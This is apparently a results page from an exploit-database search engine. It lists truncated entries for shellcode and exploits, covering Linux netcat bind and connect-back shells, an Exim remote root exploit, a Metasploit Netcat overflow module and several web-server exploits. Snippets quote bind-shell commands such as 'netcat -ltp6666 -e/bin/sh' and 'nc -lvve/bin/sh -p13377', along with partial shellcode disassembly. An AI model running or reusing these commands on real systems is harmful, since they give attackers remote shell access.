Lucene search
+L

695 matches found

0day.today
0day.today
added 2011/04/23 12:0 a.m.27 views

linux/x86 - netcat bindshell port 6666 - 69 bytes

/ Title: Linux/x86 - netcat bindshell port 6666 - 69 bytes Date: 2011-04-20 Author: Jonathan Salwan http://shell-storm.org http://twitter.com/!/shellstorm /usr/bin/netcat -ltp6666 -e/bin/sh 8048054 : 8048054: 31 c0 xor %eax,%eax 8048056: 50 push %eax 8048057: 68 74 63 61 74 push $0x74616374...

7.4AI score
SaveExploits0
Exploit DB
Exploit DB
added 2011/04/21 12:0 a.m.30 views

Linux/x86 - netcat bindshell port 6666 - 69 bytes

Linux/x86 - netcat bindshell port 6666 - 69 bytes. Shellcode exploit for linux platform / Title: Linux/x86 - netcat bindshell port 6666 - 69 bytes Date: 2011-04-20 Author: Jonathan Salwan http://shell-storm.org http://twitter.com/jonathansalwan /usr/bin/netcat -ltp6666 -e/bin/sh 8048054 : 8048054...

7.4AI score
SaveExploits0
rdot
rdot
added 2011/03/19 12:0 a.m.78 views

Основы написания Win-шеллкода

В этой статье речь пойдет о написании простого шеллкода под Windows платформу. Статья является начальным этапом цикла статей, которые я, опираясь на материалы и труды зарубежных специалистов в данной области, планирую написать. Эта статья не насыщена всеобъемлющей информацией, однако её цель -...

7AI score
SaveExploits0
exploitpack
exploitpack
added 2010/12/11 12:0 a.m.18 views

Exim 4.63 - Remote Command Execution

Exim 4.63 - Remote Command Execution Exim 4.63 RedHat/Centos/Debian Remote Root Exploit by Kingcope Modified perl version of metasploit module =for comment use this connect back shell as "trojanurl" and be sure to setup a netcat, ---snip--- $system = '/bin/sh'; $ARGC=@ARGV; if $ARGC!=2 print...

7.7AI score
SaveExploits0
Packet Storm
Packet Storm
added 2010/12/11 12:0 a.m.266 views

Exim 4.63 Remote Root Exploit

Exim 4.63 RedHat/Centos/Debian Remote Root Exploit by Kingcope Modified perl version of metasploit module =for comment use this connect back shell as "trojanurl" and be sure to setup a netcat, ---snip--- $system = '/bin/sh'; $ARGC=@ARGV; if $ARGC!=2 print "Usage: $0 Host Port \n\n"; die "Ex: $0...

9.3CVSS0.1AI score0.71901EPSS
SaveExploits8
exploitpack
exploitpack
added 2010/12/10 12:0 a.m.28 views

Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow

Litespeed Web Server 4.0.17 with PHP FreeBSD - Remote Overflow LiteSpeed Web Server 4.0.17 w/ PHP Remote Exploit for FreeBSD bug discovered & exploited by Kingcope Dec 2010 Lame Xploit Tested with success on FreeBSD 8.0-RELEASE - LiteSpeed WebServer 4.0.17 Standard & Enterprise x86 FreeBSD...

0.1AI score
SaveExploits0
Exploit DB
Exploit DB
added 2010/07/11 12:0 a.m.34 views

Linux x86 netcat bindshell port 8080 - 75 bytes

Linux x86 netcat bindshell port 8080 - 75 bytes. Shellcode exploit for linux platform / 08048060 : 8048060: eb 2a jmp 804808c 08048062 : 8048062: 5e pop %esi 8048063: 31 c0 xor %eax,%eax 8048065: 88 46 07 mov %al,0x7%esi 8048068: 88 46 0f mov %al,0xf%esi 804806b: 88 46 19 mov %al,0x19%esi 804806e...

SaveExploits0
0day.today
0day.today
added 2010/07/11 12:0 a.m.23 views

linux/x86 netcat bindshell port 8080 75 bytes

Exploit for linux/x86 platform in category shellcode ============================================= linux/x86 netcat bindshell port 8080 75 bytes ============================================= / 08048060 : 8048060: eb 2a jmp 804808c 08048062 : 8048062: 5e pop %esi 8048063: 31 c0 xor %eax,%eax...

7AI score
SaveExploits0
0day.today
0day.today
added 2010/07/11 12:0 a.m.23 views

linux/x86 netcat connect back port 8080 76 bytes

Exploit for linux/x86 platform in category shellcode ================================================ linux/x86 netcat connect back port 8080 76 bytes ================================================ / 08048060 : 8048060: eb 2a jmp 804808c 08048062 : 8048062: 5e pop %esi 8048063: 31 c0 xor...

7AI score
SaveExploits0
Exploit DB
Exploit DB
added 2010/07/11 12:0 a.m.44 views

Linux x86 netcat connect back port 8080 - 76 bytes

Linux x86 netcat connect back port 8080 - 76 bytes. Shellcode exploit for linx86 platform / 08048060 : 8048060: eb 2a jmp 804808c 08048062 : 8048062: 5e pop %esi 8048063: 31 c0 xor %eax,%eax 8048065: 88 46 07 mov %al,0x7%esi 8048068: 88 46 15 mov %al,0x15%esi 804806b: 88 46 1a mov %al,0x1a%esi...

0.3AI score
SaveExploits0
exploitpack
exploitpack
added 2010/07/09 12:0 a.m.19 views

dotDefender 3.8-5 - Remote Code Execution (via Cross-Site Scripting)

dotDefender 3.8-5 - Remote Code Execution via Cross-Site Scripting / DotDefender = 3.8-5 No Authentication Remote Code Execution Through XSS Tested on DotDefender 3.8-5 On Ubuntu Server 9.10 64-bit with Firefox 3.6.3 Paul Hand aka rAWjAW AT offsec.com Original Post-Authentication Remote Command...

0.5AI score
SaveExploits0
Exploit DB
Exploit DB
added 2010/06/22 12:0 a.m.36 views

Netcat 1.10 - NT Stack Buffer Overflow (Metasploit)

$Id: netcat110nt.rb 9587 2010-06-22 23:57:05Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/...

7.5CVSS5.2AI score0.60412EPSS
SaveExploits4
Exploit DB
Exploit DB
added 2010/04/02 12:0 a.m.24 views

linux x86 - nc -lvve/bin/sh -p13377 shellcode

linux x86 nc -lvve/bin/sh -p13377 shellcode. Shellcode exploit for linux platform linux x86 nc -lvve/bin/sh -p13377 shellcode This shellcode will listen on port 13377 using netcat and give /bin/sh to connecting attacker Author: Anonymous Site: http://chaossecurity.wordpress.com/ Here is code...

7.4AI score
SaveExploits0
0day.today
0day.today
added 2010/04/02 12:0 a.m.23 views

linux x86 nc -lvve/bin/sh -p13377 shellcode

Exploit for linux/x86 platform in category shellcode =========================================== linux x86 nc -lvve/bin/sh -p13377 shellcode =========================================== linux x86 nc -lvve/bin/sh -p13377 shellcode This shellcode will listen on port 13377 using netcat and give /bin/...

7AI score
SaveExploits0
Packet Storm
Packet Storm
added 2010/03/28 12:0 a.m.17 views

tPop3d 1.5.3 Denial Of Service

Exploit Title: tPop3d 1.5.3 DoS Date: 3/26/10 Author: OrderZero Software Link: http://www.ex-parrot.com/chris/tpop3d/ Download: http://www.ex-parrot.com/chris/tpop3d/tpop3d-1.5.3.tar.gz Version: 1.5.3 Debug: Starting program: /usr/local/sbin/tpop3d -d listenernew: gethostbyaddr0.0.0.0: cannot...

7.4AI score
SaveExploits0
Exploit DB
Exploit DB
added 2009/12/30 12:0 a.m.67 views

Microsoft IIS - ASP Multiple Extensions Security Bypass 5.x/6.x Vulnerabilities

!/usr/bin/python Exploit Title: Exploit for Microsoft IIS ASP Multiple Extensions Security Bypass 5.x/6.x Date: 29 dec 2009 Author: Emanuele 'emgent' Gentili and Emanuele 'crossbower' Acri Software Link: N/A Version: IIS 5.x/6.x Tested on: Windows 2003 Server SP2 CVE : N/A Code :...

5.8AI score
SaveExploits0
Packet Storm
Packet Storm
added 2009/11/26 12:0 a.m.38 views

Netcat v1.10 NT Stack Overflow

$Id$ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require 'msf/core' class Metasploit3 'Netcat v1.10...

7.5CVSS0.7AI score0.60412EPSS
SaveExploits4
myhack58
myhack58
added 2009/11/17 12:0 a.m.26 views

PHP and ASP upload vulnerability exploit-vulnerability warning-the black bar safety net

1 pass exploit the principles just for the form format of the upload of asp and php scripts ncnetcat For the submission packet the dos interface to run under: nc-vv www.. com 8 01.txt -vv: echo 8 0: the www port 1.txt: is your data packet to be transmitted use of more methods, please check this...

7.2AI score
SaveExploits0
Saint
Saint
added 2009/09/01 12:0 a.m.38 views

Oracle Secure Backup property_box.php type parameter command execution

Added: 09/01/2009 CVE: CVE-2009-1978 BID: 35678 OSVDB: 55904 Background Oracle Secure Backup is a centralized tape backup management solution for Oracle Database. Problem A command execution vulnerability in the Oracle Secure Backup web interface allows remote attackers to execute arbitrary...

9CVSS7.2AI score0.64694EPSS
SaveExploits13
myhack58
myhack58
added 2009/08/18 12:0 a.m.49 views

Under Linux the rebound CmdLine Shell tips-vulnerability warning-the black bar safety net

Last nightshould be early this morningplaying for a long time friend of Linux WebShell, and wanted to practice what UDEV to provide the right it, and finally found that the server seems to have been patched. But still there are other harvest, so I just YY under Linux to bounce a shell problem...

7.7AI score
SaveExploits0
Rows per page
Query Builder